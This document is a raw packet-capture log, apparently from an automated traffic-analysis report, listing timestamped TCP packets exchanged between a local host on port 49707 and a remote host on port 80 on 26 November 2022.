Nov 26, 2022 11:17:42.425821066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425827980 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425841093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425846100 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425858021 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425864935 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425869942 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425883055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425894022 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425901890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425920010 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425920963 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425920963 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425940990 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425941944 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425959110 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425970078 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425977945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.425983906 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425995111 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.425996065 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426014900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426016092 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426028967 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426033020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426050901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426059008 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426069021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426074028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426088095 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426093102 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426104069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426105976 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426122904 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426126003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426140070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426145077 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426162958 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426165104 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426177979 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426182032 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426201105 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426202059 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426218987 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426219940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426235914 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426240921 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426259041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426263094 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426275969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426276922 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426295996 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426306963 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426321983 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426325083 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426342964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426345110 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426357031 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426361084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426376104 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426378965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426397085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426397085 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426414013 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426414967 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426434040 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426440001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426453114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426459074 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426470995 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426471949 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426489115 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426489115 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426513910 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426516056 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426532030 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426533937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426548004 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426553965 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426572084 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426574945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426588058 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426592112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426609993 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426613092 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426625013 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426629066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426644087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426645994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426661968 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426664114 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426678896 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426681995 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426696062 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426701069 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426717997 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426722050 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426733971 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426734924 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426749945 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426753998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426769972 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426770926 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426784039 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426789999 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426806927 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426806927 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426824093 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426825047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426843882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426848888 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426861048 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426862001 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426913023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426913023 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426918983 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426945925 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426959038 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426973104 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.426990032 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.426994085 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427006960 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427014112 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427032948 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427037954 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427052975 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427057981 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427071095 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427073002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427090883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427097082 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427109003 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427126884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427141905 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427146912 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427155972 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427165985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427185059 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427202940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427207947 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427221060 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427233934 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427241087 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427249908 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427258968 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427265882 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427279949 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427284002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427299023 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427304029 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427316904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427316904 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427335978 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427347898 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427355051 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427372932 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427382946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427391052 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427401066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427401066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427405119 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427422047 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427428961 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427439928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427459002 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427459002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427479029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427489996 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427489996 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427496910 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427516937 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427524090 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427535057 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427537918 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427553892 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427558899 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427572012 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427573919 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427589893 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427608013 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427625895 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427625895 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427625895 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427625895 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427644014 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427644014 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427655935 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427664042 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427680969 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427684069 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427695036 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427699089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427714109 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427716970 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427730083 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427735090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427752018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427753925 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427768946 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427771091 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427783012 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427788019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427808046 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427808046 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427820921 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427825928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427844048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427850008 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427862883 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427865028 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427881002 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427881956 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427900076 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427902937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427916050 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427917957 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427931070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427933931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427953005 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427966118 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427972078 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427979946 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.427989960 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.427998066 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428009033 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428014040 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428026915 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428033113 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428045034 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428047895 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428064108 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428065062 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428081989 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428081989 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428098917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428100109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428112984 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428118944 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428137064 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428139925 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428154945 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428164005 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428174019 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428178072 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428189993 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428191900 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428210974 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428227901 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428229094 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428245068 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428248882 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428266048 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428277016 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428283930 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428302050 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428303003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428319931 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428330898 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428337097 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428354979 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428359032 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428359032 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428373098 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428390026 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428391933 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428410053 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428410053 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428428888 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428435087 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428447008 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428457022 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428466082 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428469896 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428484917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428484917 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428503036 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428505898 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428525925 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428531885 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.428544998 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.428584099 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.448311090 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448343992 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448363066 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448381901 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448401928 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448421001 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.448424101 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448443890 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448457003 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.448463917 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448478937 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.448498011 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448523998 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448548079 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448575020 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448577881 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.448577881 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.448577881 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.448600054 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448604107 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.448622942 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.448626041 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448652029 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448677063 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448689938 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.448700905 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448724985 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448734999 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.448750973 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448765039 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.448765039 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.448776007 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448786020 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.448801994 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448807955 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.448823929 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448824883 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.448842049 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.448851109 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448874950 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.448875904 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448893070 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.448899984 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448925018 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448937893 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.448937893 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.448949099 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448972940 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.448996067 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.448997021 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449021101 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449022055 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449047089 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449059963 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449059963 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449071884 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449083090 CET	49707	80	192.168.2.5	66.235.200.147
Nov 26, 2022 11:17:42.449095964 CET	80	49707	66.235.200.147	192.168.2.5
Nov 26, 2022 11:17:42.449115038 CET	80	49707	66.235.200.147	192.168.2.5
